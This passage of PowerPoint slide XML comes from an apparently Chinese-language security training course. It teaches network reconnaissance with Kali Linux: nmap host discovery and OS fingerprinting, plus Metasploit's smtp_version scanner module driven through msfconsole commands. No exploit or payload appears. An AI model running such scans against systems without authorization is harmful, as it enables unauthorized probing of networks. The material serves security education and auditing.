                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行SMTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="文本框 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360670" y="629602"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架。使用“search smtp_version”命令找出smtp_version模块使用路径，如图2-4-37所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360670" y="1828483"/>
            <a:ext cx="5276850" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="文本框 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360670" y="3428683"/>
            <a:ext cx="5080000" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-37 搜索smtp_version模块路径2.输入“use auxiliary/scanner/smtp/smtp_version”命令使用smtp_version扫描模块，这个模块能够扫描SMTP服务的版本，如图2-4-38所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360670" y="5181917"/>
            <a:ext cx="3800475" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="文本框 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360670" y="5639117"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-38 使用smtp_version扫描模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>本项目使用Kali Linux操作系统中的nmap工具进行主机的存活扫描，确认在线办公计算机的数量。通过主机的系统辨识对在线办公计算机进行操作系统辨识，然后使用端口与脚本扫描对办公计算机进行安全扫描并完成排查登记。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行SMTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
